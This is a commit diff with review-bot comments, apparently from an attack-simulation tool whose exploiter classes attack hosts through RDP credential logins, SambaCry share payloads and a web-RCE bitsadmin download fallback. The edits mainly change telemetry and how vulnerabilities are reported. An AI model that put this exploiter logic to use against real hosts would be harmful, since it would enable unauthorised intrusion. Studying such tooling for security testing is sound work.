Merge branch 'attack_report' into brute_force_report
commit
2ab3be6437
|
@ -316,7 +316,7 @@ class RdpExploiter(HostExploiter):
|
||||||
|
|
||||||
if client_factory.success:
|
if client_factory.success:
|
||||||
if not self._config.rdp_use_vbs_download:
|
if not self._config.rdp_use_vbs_download:
|
||||||
VictimHostTelem("T1197", ScanStatus.USED.value, self.host, BITS_UPLOAD_STRING)
|
VictimHostTelem("T1197", ScanStatus.USED.value, self.host, BITS_UPLOAD_STRING).send()
|
||||||
self.add_vuln_port(RDP_PORT)
|
self.add_vuln_port(RDP_PORT)
|
||||||
exploited = True
|
exploited = True
|
||||||
self.report_login_attempt(True, user, password)
|
self.report_login_attempt(True, user, password)
|
||||||
|
|
|
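Review bot: The added `.send()` runs before `self.add_vuln_port(RDP_PORT)`, `exploited = True` and `self.report_login_attempt(True, user, password)`, so if sending telemetry can raise (its implementation is not visible here), a reporting failure would leave a successful RDP login unrecorded. I would move `VictimHostTelem("T1197", ScanStatus.USED.value, self.host, BITS_UPLOAD_STRING).send()` below `self.report_login_attempt(True, user, password)`, still under the `rdp_use_vbs_download` check. Alternatively, make the send best-effort so that a failure is only logged. Indentation is lost on this page and the enclosing method starts and ends outside the hunk, so the exact nesting should be checked against the file.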
@ -82,7 +82,11 @@ class SambaCryExploiter(HostExploiter):
|
||||||
trigger_result is not None, creds['username'], creds['password'], creds['lm_hash'], creds['ntlm_hash'])
|
trigger_result is not None, creds['username'], creds['password'], creds['lm_hash'], creds['ntlm_hash'])
|
||||||
if trigger_result is not None:
|
if trigger_result is not None:
|
||||||
successfully_triggered_shares.append((share, trigger_result))
|
successfully_triggered_shares.append((share, trigger_result))
|
||||||
self.add_vuln_port(self.SAMBA_PORT)
|
url = "smb://%(username)s@%(host)s:%(port)s/%(share_name)s" % {'username': creds['username'],
|
||||||
|
'host': self.host.ip_addr,
|
||||||
|
'port': self.SAMBA_PORT,
|
||||||
|
'share_name': share}
|
||||||
|
self.add_vuln_url(url)
|
||||||
self.clean_share(self.host.ip_addr, share, writable_shares_creds_dict[share])
|
self.clean_share(self.host.ip_addr, share, writable_shares_creds_dict[share])
|
||||||
|
|
||||||
for share, fullpath in successfully_triggered_shares:
|
for share, fullpath in successfully_triggered_shares:
|
||||||
|
@ -92,6 +96,7 @@ class SambaCryExploiter(HostExploiter):
|
||||||
LOG.info(
|
LOG.info(
|
||||||
"Shares triggered successfully on host %s: %s" % (
|
"Shares triggered successfully on host %s: %s" % (
|
||||||
self.host.ip_addr, str(successfully_triggered_shares)))
|
self.host.ip_addr, str(successfully_triggered_shares)))
|
||||||
|
self.add_vuln_port(self.SAMBA_PORT)
|
||||||
return True
|
return True
|
||||||
else:
|
else:
|
||||||
LOG.info("No shares triggered successfully on host %s" % self.host.ip_addr)
|
LOG.info("No shares triggered successfully on host %s" % self.host.ip_addr)
|
||||||
|
|
|
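Review bot: In the first hunk `creds['username']` and `share` are formatted into the `smb://` URL unescaped. A username containing `@`, `/`, `\` or `:` (a domain-qualified account, for instance) or a share name with spaces will therefore produce a URL that the report and anything parsing it read ambiguously. Percent-encode both parts before formatting, e.g. `'username': quote(creds['username'], safe='')` and `'share_name': quote(share, safe='')`, using the standard library's URL quoting function. If `creds['username']` can be empty for anonymous access (not visible here), the result would be `smb://@host:port/share`, so that case should drop the userinfo part. A short comment such as `# only the username is stored in the vuln URL; password and hashes are never included` would also help later maintainers keep it that way.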
@ -307,7 +307,7 @@ class WebRCE(HostExploiter):
|
||||||
if not isinstance(resp, bool) and POWERSHELL_NOT_FOUND in resp:
|
if not isinstance(resp, bool) and POWERSHELL_NOT_FOUND in resp:
|
||||||
LOG.info("Powershell not found in host. Using bitsadmin to download.")
|
LOG.info("Powershell not found in host. Using bitsadmin to download.")
|
||||||
backup_command = RDP_CMDLINE_HTTP % {'monkey_path': dest_path, 'http_path': http_path}
|
backup_command = RDP_CMDLINE_HTTP % {'monkey_path': dest_path, 'http_path': http_path}
|
||||||
VictimHostTelem("T1197", ScanStatus.USED.value, self.host, BITS_UPLOAD_STRING)
|
VictimHostTelem("T1197", ScanStatus.USED.value, self.host, BITS_UPLOAD_STRING).send()
|
||||||
resp = self.exploit(url, backup_command)
|
resp = self.exploit(url, backup_command)
|
||||||
return resp
|
return resp
|
||||||
|
|
||||||
|
|
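Review bot: The T1197 telemetry is sent with `ScanStatus.USED` before `self.exploit(url, backup_command)` runs, so the attack report will list BITS Jobs as used even when the bitsadmin fallback fails. If USED is meant to say the technique actually ran, send it after the call and only on success: `resp = self.exploit(url, backup_command)` followed by `if resp: VictimHostTelem("T1197", ScanStatus.USED.value, self.host, BITS_UPLOAD_STRING).send()`. That a truthy `resp` means success is inferred from the `isinstance(resp, bool)` check earlier in the hunk and should be confirmed. The enclosing method starts outside the hunk.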